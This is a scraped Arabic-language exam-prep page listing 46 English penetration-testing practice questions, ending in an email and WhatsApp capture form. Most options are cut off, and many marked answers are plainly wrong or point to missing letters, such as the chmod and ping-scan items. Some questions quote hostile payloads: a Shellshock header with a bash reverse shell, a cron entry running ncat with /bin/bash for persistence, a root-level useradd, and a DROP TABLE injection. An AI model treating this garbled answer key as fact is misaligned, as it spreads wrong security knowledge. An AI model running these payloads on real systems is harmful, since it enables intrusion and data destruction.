لا تريد أن تفوت شيئا؟

نصائح اجتياز امتحان الشهادة

آخر أخبار الامتحانات ومعلومات الخصم

برعاية وحديثة من قبل خبرائنا

نعم، أرسل لي النشرة الإخبارية

خذ اختبارات أخرى عبر الإنترنت

السؤال #1
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?
A. Understanding the tactics of a security intrusion can help disrupt them
B. Scripts that are part of the framework can be imported directly into SIEM tools
عرض الإجابة
اجابة صحيحة: D
السؤال #2
The results of an Nmap scan are as follows: Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST Nmap scan report for ( 10.2.1.22 ) Host is up (0.0102s latency). Not shown: 998 filtered ports Port State Service 80/tcp open http |_http-title: 80F 22% RH 1009.1MB (text/html) |_http-slowloris-check: | VULNERABLE: | Slowloris DoS Attack | <..> Device type: bridge|general purpose Running (JUST GUESSING) : QEMU (95%) OS CPE: cpe:/a:qemu:qemu No exact OS matches found for host (test conditions non-ideal
B. Public-facing web server C
E. Exposed RDP
F. Print queue
عرض الإجابة
اجابة صحيحة: D
السؤال #3
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal?
A. Metasploit B
عرض الإجابة
اجابة صحيحة: B
السؤال #4
A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?
A. SQLmap
B. Nessus C
عرض الإجابة
اجابة صحيحة: B
السؤال #5
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.)
A. Scraping social media sites
B. Using the WHOIS lookup tool C
E. Utilizing DNS lookup tools
F. Conducting wardriving near the client facility
عرض الإجابة
اجابة صحيحة: C
السؤال #6
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. chmod u+x script
B. chmod u+e script
عرض الإجابة
اجابة صحيحة: BD
السؤال #7
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report?
A. Stronger algorithmic requirements
B. Access controls on the server C
عرض الإجابة
اجابة صحيحة: B
السؤال #8
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?
A. Data flooding
B. Session riding C
عرض الإجابة
اجابة صحيحة: B
السؤال #9
A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?
A. Badge cloning
B. Dumpster diving C
عرض الإجابة
اجابة صحيحة: A
السؤال #10
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {"User-Agent": "() { ignored;};/bin/bash –i>& /dev/ tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A. exploits = {"User-Agent": "() { ignored;};/bin/bash –i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. exploits = {"User-Agent": "() { ignored;};/bin/bash –i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"} C
عرض الإجابة
اجابة صحيحة: C
السؤال #11
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?
A. Nmap B
عرض الإجابة
اجابة صحيحة: C
السؤال #12
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal? A.Wireshark B.Aircrack-ng C.Kismet D.Wifite
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal? A
عرض الإجابة
اجابة صحيحة: B
السؤال #13
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations? A.NIST SP 800-53 B.OWASP Top 10 C.MITRE ATT&CK framework D.PTES technical guidelines
عرض الإجابة
اجابة صحيحة: C
السؤال #14
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system? A.schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe B.wmic startup get caption,command C.crontab –l; echo "@reboot sleep 200 && ncat –lvp 4242 –e /bin/bash") | crontab 2>/dev/null D.sudo useradd –ou 0 –g 0 user
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system? A
عرض الإجابة
اجابة صحيحة: C
السؤال #15
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
A. Shodan
B. Nmap C
عرض الإجابة
اجابة صحيحة: D
السؤال #16
The results of an Nmap scan are as follows: Which of the following would be the BEST conclusion about this device?
A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory
B. This device is most likely a gateway with in-band management services
عرض الإجابة
اجابة صحيحة: C
السؤال #17
HOTSPOT You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A.
عرض الإجابة
اجابة صحيحة: D
السؤال #18
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary dat
A. The penetration testers have been given an internal network starting position
A. Exploiting a configuration weakness in the SQL database
B. Intercepting outbound TLS traffic C
E. Establishing and maintaining persistence on the domain controller
عرض الإجابة
اجابة صحيحة: A
السؤال #19
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier. Which of the following is the BEST action for the penetration tester to take?
A. Utilize the tunnel as a means of pivoting to other internal devices
B. Disregard the IP range, as it is out of scope
عرض الإجابة
اجابة صحيحة: B
السؤال #20
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment?
A. Partially known environment testing
B. Known environment testing C
عرض الإجابة
اجابة صحيحة: A
السؤال #21
A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan? A.nmap -sn 10.12.1.0/24 B.nmap -sV -A 10.12.1.0/24 C.nmap -Pn 10.12.1.0/24 D.nmap -sT -p- 10.12.1.0/24
A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan? A
عرض الإجابة
اجابة صحيحة: D
السؤال #22
A company that developers embedded software for the automobile industry has hired a penetrationtesting team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would
A. The reverse-engineering team may have a history of selling exploits to third parties
B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis
عرض الإجابة
اجابة صحيحة: A
السؤال #23
A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, ablank page was displayed. Which of the following is the MOST likely reason for the lack of output?
A. The HTTP port is not open on the firewall
B. The tester did not run sudo before the command
عرض الإجابة
اجابة صحيحة: A
السؤال #24
The following line-numbered Python code snippet is being used in reconnaissance: Which of the following line numbers from the script MOST likely contributed to the script triggering a "probable port scan" alert in the organization's IDS?
A. Line 01
B. Line 02 C
عرض الإجابة
اجابة صحيحة: C
السؤال #25
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?
A. To provide feedback on the report structure and recommend improvements
B. To discuss the findings and dispute any false positives C
عرض الإجابة
اجابة صحيحة: B
السؤال #26
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance?
A. Wardriving
B. Shodan C
عرض الإجابة
اجابة صحيحة: A
السؤال #27
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?
A. Whether sensitive client data is publicly accessible
B. Whether the connection between the cloud and the client is secure C
عرض الإجابة
اجابة صحيحة: AC
السؤال #28
A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report?
A. Delete the scheduled batch job
B. Close the reverse shell connection
عرض الإجابة
اجابة صحيحة: B
السؤال #29
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router. Which of the following is MOST vulnerable to a brute-force attack? A.WPS B.WPA2-EAP C.WPA-TKIP D.WPA2-PSK
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router
عرض الإجابة
اجابة صحيحة: A
السؤال #30
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?
A. Attempting to tailgate an employee going into the client's workplace
B. Dropping a malicious USB key with the company's logo in the parking lot C
عرض الإجابة
اجابة صحيحة: B
السؤال #31
A penetration tester conducted a vulnerability scan against a client's critical servers and found the following: Which of the following would be a recommendation for remediation?
A. Deploy a user training program
B. Implement a patch management plan C
عرض الإجابة
اجابة صحيحة: C
السؤال #32
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish?
A. Uncover potential criminal activity based on the evidence gathered
B. Identity all the vulnerabilities in the environment
عرض الإجابة
اجابة صحيحة: A
السؤال #33
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
A. Unsupported operating systems
B. Susceptibility to DDoS attacks C
عرض الإجابة
اجابة صحيحة: A
السؤال #34
A penetration tester conducts an Nmap scan against a target and receives the following results: Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?
A. Nessus
B. ProxyChains C
عرض الإجابة
اجابة صحيحة: D
السؤال #35
A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements?
A. "cisco-ios" "admin+1234"
B. "cisco-ios" "no-password" C
عرض الإجابة
اجابة صحيحة: D
السؤال #36
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server?
A. Perform vertical privilege escalation
B. Replay the captured traffic to the server to recreate the session
عرض الإجابة
اجابة صحيحة: C
السؤال #37
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?
A. To remove hash-cracking registry entries
B. To remove the tester-created Mimikatz account C
عرض الإجابة
اجابة صحيحة: C
السؤال #38
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Which of the following is most important for the penetration tester to defi
A. Establish the format required by the client
B. Establish the threshold of risk to escalate to the client immediately
عرض الإجابة
اجابة صحيحة: B
السؤال #39
A penetration tester conducted an assessment on a web server. The logs from this session show the following: http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- Which of the following attacks is being attempted? A.Clickjacking
B. Session hijacking C
عرض الإجابة
اجابة صحيحة: B
السؤال #40
A compliance-based penetration test is primarily concerned with:
A. obtaining Pll from the protected network
B. bypassing protection on edge devices
عرض الإجابة
اجابة صحيحة: C
السؤال #41
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?
A. Cost ofthe assessment
B. Report distribution C
عرض الإجابة
اجابة صحيحة: A
السؤال #42
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective?
A. nmap -sT -vvv -O 192
B. nmap -sV 192
عرض الإجابة
اجابة صحيحة: A
السؤال #43
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees' numbers?
A. Web archive B
عرض الإجابة
اجابة صحيحة: A
السؤال #44
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server? A.OpenVAS B.Nikto C.SQLmap D.Nessus
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy
عرض الإجابة
اجابة صحيحة: A
السؤال #45
SIMULATION You are a penetration tester running port scans on a server. INSTRUCTIONS Part 1: Given the output, construct the command that was used to generate this output from the available options. Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A. See explanation below
عرض الإجابة
اجابة صحيحة: C
السؤال #46
Which of the following should a penetration tester attack to gain control of the state in the HTTPprotocol after the user is logged in?
A. HTTPS communication
B. Public and private keys C
عرض الإجابة
اجابة صحيحة: A

عرض الإجابات بعد التقديم

يرجى إرسال البريد الإلكتروني الخاص بك والواتس اب للحصول على إجابات الأسئلة.

ملحوظة: يرجى التأكد من صلاحية معرف البريد الإلكتروني وWhatsApp حتى تتمكن من الحصول على نتائج الاختبار الصحيحة.

بريد إلكتروني:
رقم الواتس اب/الهاتف: